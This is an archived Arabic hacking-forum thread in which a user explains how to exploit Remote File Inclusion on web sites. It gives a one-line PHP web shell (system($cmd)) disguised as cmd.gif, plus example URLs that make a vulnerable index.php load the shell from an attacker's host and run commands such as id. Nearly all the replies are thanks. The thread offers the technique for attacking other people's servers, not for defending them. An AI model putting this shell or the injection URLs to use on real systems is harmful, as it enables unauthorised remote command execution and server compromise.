المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : شرح استغلال ثغرات File Inclusion شرح سهل جدا



Mr.JnOoN
11-22-2012, 05:39 PM
السلام عليكم
نيجي للشرح @@@@@@@@@

ثغرات File Inclusion
============================== =====

الثغرات المسماه Remote File Inclusion شبيهه بعمل Remote Command Execution

لكن الفرق يلزم كود لرفعه لموقعك ومن ثم تأخذ رابطه وتستخدمه للاستغلال
مثال الاستغلال :

http://www******.net/index.php?mode=http://site?&cmd

http://site = موقعك
?&cmd = كود مرفوع بموقعك
افتح النوت باد Notepad وادخل هذا الكود واحفظها باسم cmd.gif
كود:

<?
system($cmd);
?>
*/


وعند الاستغلال

http://www.*******.net/index.php?mode=http://site.com/cmd.gif?&cmd=id


...


أن Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الأوامر مكان الآي دي id ((رابط موقعك مع الـ id ))

و Remote Command Execution تستخدم أوامر اللينكس على مباشرة بدون كود مرفوع (( الـ idفقط ))

انشالله يكون الشرح بسيط ومفهوم

brader
11-22-2012, 05:45 PM
:مشكور حبيبي تستاهل التقييم وتم التقييم

بالتوفيق

Mr.JnOoN
11-22-2012, 06:04 PM
شكرآ لك اخي الطيب

- - - تم التحديث - - -

شكرآ لك اخي الطيب

(dz-adil@x-HaCkEr)
11-22-2012, 07:50 PM
مشكور يا غالي
تسلم على الشرح

hack:muthm
11-23-2012, 01:22 AM
الف شكر لك عزيزي ,,,
مجهود يستاهل التقييم

ضلال هكر
11-30-2012, 03:57 AM
مشكور آلله يعطيك آلعآآفية

عبدالعزيز البلوي
12-15-2012, 04:51 PM
مششششششششششكور

ArsHackEna
12-16-2012, 10:24 PM
يــــــــــــــــــــــا حبيبي مبدع

saif cc
12-17-2012, 03:02 AM
دمــت متألــق

تقبل مروري

Hacker Rakan
12-17-2012, 03:18 AM
.. مشكور أخوي مبدع .. ودائما مبدع في مواضيعك ..
ألف شكرا لك ..
.. = تقبل مروريَ اخويَِ

aymen cyril kamar
12-22-2012, 05:53 PM
مشكوورررررر

- - - تم التحديث - - -

بس الرابط مو شغاللللل

Māśќэɒ Sйĭpэя
01-08-2013, 06:56 PM
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
تسلم يابطل
برجاء وضع الاكواد فى php
موفق باذن الله

ayota elfar
01-09-2013, 10:05 PM
تسلم عالموضوع
بالتوفيق

عبدالله97
01-09-2013, 10:06 PM
http://www.islamroses.com/ibw/uploads/post-17-1146257677.gif

ninja_007
01-13-2013, 03:49 PM
جزيل الشكر لصاحب الموضوع

OmEr MaX
01-14-2013, 01:44 AM
مشكوووووووور طرح اكثر من رائع

DanG
01-14-2013, 05:41 AM
مشكوررررررررررررررررررررر رررررررررررررررر

uuser54822
01-23-2013, 01:16 AM
يعطيك العافية